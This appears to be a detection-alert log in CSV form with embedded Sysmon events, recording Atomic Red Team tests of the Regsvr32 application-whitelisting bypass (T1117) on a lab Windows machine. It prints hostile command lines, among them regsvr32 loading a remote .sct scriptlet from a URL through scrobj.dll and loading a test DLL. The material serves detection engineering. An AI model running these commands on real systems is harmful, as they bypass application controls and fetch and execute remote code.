+ 4 + 1 + 0 + 0x8000000000000000 + + + 4045 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:53:46.867 + 747F3D96-D97A-5D31-0000-001019DE3800 + 5828 + C:\Windows\System32\regsvr32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Microsoft(C) Register Server + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\regsvr32.exe" /s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=FC99212A5F929D707AF49E8151CAB1E30FF658EB,MD5=DA0E9A7777D16AE18BD9C642A9F42223,SHA256=F098FA150D9199732B4EC2E81528A951503A30F75AFEBF7E7A48360301758C67,IMPHASH=0235FF9A007804882636BCCCFB4D1A2F + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1117] 
Regsvr32,1563548026.975169,2019-07-19T18:53:46.975169+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\regsvr32.exe ) through command line ( "C:\Windows\system32\regsvr32.exe" /s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4045 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:53:46.867 + 747F3D96-D97A-5D31-0000-001019DE3800 + 5828 + C:\Windows\System32\regsvr32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Microsoft(C) Register Server + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\regsvr32.exe" /s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=FC99212A5F929D707AF49E8151CAB1E30FF658EB,MD5=DA0E9A7777D16AE18BD9C642A9F42223,SHA256=F098FA150D9199732B4EC2E81528A951503A30F75AFEBF7E7A48360301758C67,IMPHASH=0235FF9A007804882636BCCCFB4D1A2F + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1563548026.975169,2019-07-19T18:53:46.975169+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\regsvr32.exe ) through command line ( "C:\Windows\system32\regsvr32.exe" /s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4045 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:53:46.867 + 747F3D96-D97A-5D31-0000-001019DE3800 + 5828 + C:\Windows\System32\regsvr32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Microsoft(C) Register Server + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\regsvr32.exe" /s 
C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=FC99212A5F929D707AF49E8151CAB1E30FF658EB,MD5=DA0E9A7777D16AE18BD9C642A9F42223,SHA256=F098FA150D9199732B4EC2E81528A951503A30F75AFEBF7E7A48360301758C67,IMPHASH=0235FF9A007804882636BCCCFB4D1A2F + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1117] Bypassing Application Whitelisting,1563548026.893188,2019-07-19T18:53:46.893188+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\SysWOW64\regsvr32.exe) with commandline ( "C:\Windows\syswow64\regsvr32.exe" /s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll)",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4044 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:53:46.831 + 747F3D96-D97A-5D31-0000-00109DDC3800 + 3564 + C:\Windows\SysWOW64\regsvr32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Microsoft(C) Register Server + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\syswow64\regsvr32.exe" /s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=CE09FA2A1DD10D0F675A1F0513F3C4EE4D7C3AC0,MD5=4D97D6FC07642D4F744C8C59DB674302,SHA256=E0E722A00C127E0425D2078E738B7A684C9F55A9BF521C67E9A40D796C8BE0E9,IMPHASH=99BBF1337F3DA5CFAB67854DF4ADE1D8 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1117] Regsvr32,1563548026.893188,2019-07-19T18:53:46.893188+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\SysWOW64\regsvr32.exe ) through command line ( 
"C:\Windows\syswow64\regsvr32.exe" /s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4044 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:53:46.831 + 747F3D96-D97A-5D31-0000-00109DDC3800 + 3564 + C:\Windows\SysWOW64\regsvr32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Microsoft(C) Register Server + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\syswow64\regsvr32.exe" /s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=CE09FA2A1DD10D0F675A1F0513F3C4EE4D7C3AC0,MD5=4D97D6FC07642D4F744C8C59DB674302,SHA256=E0E722A00C127E0425D2078E738B7A684C9F55A9BF521C67E9A40D796C8BE0E9,IMPHASH=99BBF1337F3DA5CFAB67854DF4ADE1D8 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1563548026.893188,2019-07-19T18:53:46.893188+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\SysWOW64\regsvr32.exe ) through command line ( "C:\Windows\syswow64\regsvr32.exe" /s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4044 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:53:46.831 + 747F3D96-D97A-5D31-0000-00109DDC3800 + 3564 + C:\Windows\SysWOW64\regsvr32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Microsoft(C) Register Server + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\syswow64\regsvr32.exe" /s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + 
SHA1=CE09FA2A1DD10D0F675A1F0513F3C4EE4D7C3AC0,MD5=4D97D6FC07642D4F744C8C59DB674302,SHA256=E0E722A00C127E0425D2078E738B7A684C9F55A9BF521C67E9A40D796C8BE0E9,IMPHASH=99BBF1337F3DA5CFAB67854DF4ADE1D8 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +Prohibited Process connecting to internet,1563548026.848703,2019-07-19T18:53:46.848703+04:00,,Threat,Critical,"User (MSEDGEWIN10\IEUser) run process C:\Windows\System32\regsvr32.exe and initiated network connection from hostname ( MSEDGEWIN10.home and IP ( 10.0.2.15 ) to hostname ( ) , IP ( 151.101.0.133 ) and port ( 443 )",3," + + + + + 3 + 5 + 4 + 3 + 0 + 0x8000000000000000 + + + 4043 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + Suspicious NetCon + 2019-07-19 14:53:40.896 + 747F3D96-D978-5D31-0000-0010EB313800 + 2076 + C:\Windows\System32\regsvr32.exe + MSEDGEWIN10\IEUser + tcp + true + false + 10.0.2.15 + MSEDGEWIN10.home + 49728 + + false + 151.101.0.133 + + 443 + https + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563548026.589404,2019-07-19T18:53:46.589404+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4042 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:53:46.405 + 747F3D96-D97A-5D31-0000-001089BD3800 + 7148 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + 
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1117] Regsvr32,1563548026.565529,2019-07-19T18:53:46.565529+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\calc.exe ) through command line ( "C:\Windows\System32\calc.exe" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4041 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:53:46.135 + 747F3D96-D97A-5D31-0000-00105DA83800 + 4336 + C:\Windows\System32\calc.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Calculator + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\System32\calc.exe" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=F5ED372FD8EC7C455FF66BCE73F16CA51CBC0302,MD5=DEAD69D07BC33B762ABD466FB6F53E11,SHA256=3091E2ABFB55D05D6284B6C4B058B62C8C28AFC1D883B699E9A2B5482EC6FD51,IMPHASH=8EEAA9499666119D13B3F44ECD77A729 + 747F3D96-D978-5D31-0000-0010EB313800 + 2076 + C:\Windows\System32\regsvr32.exe + regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1117] Bypassing Application Whitelisting,1563548024.117123,2019-07-19T18:53:44.117123+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\regsvr32.exe) with commandline ( regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll)",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4038 + + + + + 
Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:53:44.049 + 747F3D96-D978-5D31-0000-0010EB313800 + 2076 + C:\Windows\System32\regsvr32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Microsoft(C) Register Server + Microsoft® Windows® Operating System + Microsoft Corporation + regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=FC99212A5F929D707AF49E8151CAB1E30FF658EB,MD5=DA0E9A7777D16AE18BD9C642A9F42223,SHA256=F098FA150D9199732B4EC2E81528A951503A30F75AFEBF7E7A48360301758C67,IMPHASH=0235FF9A007804882636BCCCFB4D1A2F + 747F3D96-D978-5D31-0000-0010442F3800 + 2832 + C:\Windows\System32\cmd.exe + "C:\Windows\system32\cmd.exe" /c "regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1117] Regsvr32,1563548024.117123,2019-07-19T18:53:44.117123+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\regsvr32.exe ) through command line ( regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4038 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:53:44.049 + 747F3D96-D978-5D31-0000-0010EB313800 + 2076 + C:\Windows\System32\regsvr32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Microsoft(C) Register Server + Microsoft® Windows® Operating System + Microsoft Corporation + regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + 
SHA1=FC99212A5F929D707AF49E8151CAB1E30FF658EB,MD5=DA0E9A7777D16AE18BD9C642A9F42223,SHA256=F098FA150D9199732B4EC2E81528A951503A30F75AFEBF7E7A48360301758C67,IMPHASH=0235FF9A007804882636BCCCFB4D1A2F + 747F3D96-D978-5D31-0000-0010442F3800 + 2832 + C:\Windows\System32\cmd.exe + "C:\Windows\system32\cmd.exe" /c "regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1563548024.117123,2019-07-19T18:53:44.117123+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\regsvr32.exe ) through command line ( regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4038 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:53:44.049 + 747F3D96-D978-5D31-0000-0010EB313800 + 2076 + C:\Windows\System32\regsvr32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Microsoft(C) Register Server + Microsoft® Windows® Operating System + Microsoft Corporation + regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=FC99212A5F929D707AF49E8151CAB1E30FF658EB,MD5=DA0E9A7777D16AE18BD9C642A9F42223,SHA256=F098FA150D9199732B4EC2E81528A951503A30F75AFEBF7E7A48360301758C67,IMPHASH=0235FF9A007804882636BCCCFB4D1A2F + 747F3D96-D978-5D31-0000-0010442F3800 + 2832 + C:\Windows\System32\cmd.exe + "C:\Windows\system32\cmd.exe" /c "regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +"[T1117] 
Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1563548024.054072,2019-07-19T18:53:44.054072+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4037 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:53:44.010 + 747F3D96-D978-5D31-0000-0010442F3800 + 2832 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563548024.054072,2019-07-19T18:53:44.054072+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4037 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:53:44.010 + 747F3D96-D978-5D31-0000-0010442F3800 + 2832 + 
C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563548024.026061,2019-07-19T18:53:44.026061+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4036 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:53:43.460 + 747F3D96-D977-5D31-0000-0010771B3800 + 1476 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1117] Regsvr32,1563548023.574378,2019-07-19T18:53:43.574378+04:00,,Threat,High,Found User 
(MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\calc.exe ) through command line ( "C:\Windows\System32\calc.exe" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4035 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:53:43.339 + 747F3D96-D977-5D31-0000-00100A0E3800 + 3848 + C:\Windows\System32\calc.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Calculator + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\System32\calc.exe" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=F5ED372FD8EC7C455FF66BCE73F16CA51CBC0302,MD5=DEAD69D07BC33B762ABD466FB6F53E11,SHA256=3091E2ABFB55D05D6284B6C4B058B62C8C28AFC1D883B699E9A2B5482EC6FD51,IMPHASH=8EEAA9499666119D13B3F44ECD77A729 + 747F3D96-D976-5D31-0000-001093EA3700 + 2332 + C:\Windows\System32\regsvr32.exe + regsvr32.exe /s /u /i:C:\AtomicRedTeam\atomics\T1117\RegSvr32.sct scrobj.dll + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1117] Bypassing Application Whitelisting,1563548022.964349,2019-07-19T18:53:42.964349+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\regsvr32.exe) with commandline ( regsvr32.exe /s /u /i:C:\AtomicRedTeam\atomics\T1117\RegSvr32.sct scrobj.dll)",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4033 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:53:42.834 + 747F3D96-D976-5D31-0000-001093EA3700 + 2332 + C:\Windows\System32\regsvr32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Microsoft(C) Register Server + Microsoft® Windows® Operating System + Microsoft Corporation + regsvr32.exe /s /u /i:C:\AtomicRedTeam\atomics\T1117\RegSvr32.sct scrobj.dll + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + 
SHA1=FC99212A5F929D707AF49E8151CAB1E30FF658EB,MD5=DA0E9A7777D16AE18BD9C642A9F42223,SHA256=F098FA150D9199732B4EC2E81528A951503A30F75AFEBF7E7A48360301758C67,IMPHASH=0235FF9A007804882636BCCCFB4D1A2F + 747F3D96-D976-5D31-0000-001041E83700 + 4444 + C:\Windows\System32\cmd.exe + "C:\Windows\system32\cmd.exe" /c "regsvr32.exe /s /u /i:C:\AtomicRedTeam\atomics\T1117\RegSvr32.sct scrobj.dll" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1117] Regsvr32,1563548022.964349,2019-07-19T18:53:42.964349+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\regsvr32.exe ) through command line ( regsvr32.exe /s /u /i:C:\AtomicRedTeam\atomics\T1117\RegSvr32.sct scrobj.dll ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4033 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:53:42.834 + 747F3D96-D976-5D31-0000-001093EA3700 + 2332 + C:\Windows\System32\regsvr32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Microsoft(C) Register Server + Microsoft® Windows® Operating System + Microsoft Corporation + regsvr32.exe /s /u /i:C:\AtomicRedTeam\atomics\T1117\RegSvr32.sct scrobj.dll + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=FC99212A5F929D707AF49E8151CAB1E30FF658EB,MD5=DA0E9A7777D16AE18BD9C642A9F42223,SHA256=F098FA150D9199732B4EC2E81528A951503A30F75AFEBF7E7A48360301758C67,IMPHASH=0235FF9A007804882636BCCCFB4D1A2F + 747F3D96-D976-5D31-0000-001041E83700 + 4444 + C:\Windows\System32\cmd.exe + "C:\Windows\system32\cmd.exe" /c "regsvr32.exe /s /u /i:C:\AtomicRedTeam\atomics\T1117\RegSvr32.sct scrobj.dll" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1563548022.964349,2019-07-19T18:53:42.964349+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\regsvr32.exe ) through command line ( regsvr32.exe /s /u 
/i:C:\AtomicRedTeam\atomics\T1117\RegSvr32.sct scrobj.dll ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4033 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:53:42.834 + 747F3D96-D976-5D31-0000-001093EA3700 + 2332 + C:\Windows\System32\regsvr32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Microsoft(C) Register Server + Microsoft® Windows® Operating System + Microsoft Corporation + regsvr32.exe /s /u /i:C:\AtomicRedTeam\atomics\T1117\RegSvr32.sct scrobj.dll + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=FC99212A5F929D707AF49E8151CAB1E30FF658EB,MD5=DA0E9A7777D16AE18BD9C642A9F42223,SHA256=F098FA150D9199732B4EC2E81528A951503A30F75AFEBF7E7A48360301758C67,IMPHASH=0235FF9A007804882636BCCCFB4D1A2F + 747F3D96-D976-5D31-0000-001041E83700 + 4444 + C:\Windows\System32\cmd.exe + "C:\Windows\system32\cmd.exe" /c "regsvr32.exe /s /u /i:C:\AtomicRedTeam\atomics\T1117\RegSvr32.sct scrobj.dll" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1563548022.841951,2019-07-19T18:53:42.841951+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "regsvr32.exe /s /u /i:C:\AtomicRedTeam\atomics\T1117\RegSvr32.sct scrobj.dll" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4032 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:53:42.803 + 747F3D96-D976-5D31-0000-001041E83700 + 4444 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "regsvr32.exe /s /u /i:C:\AtomicRedTeam\atomics\T1117\RegSvr32.sct scrobj.dll" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + 
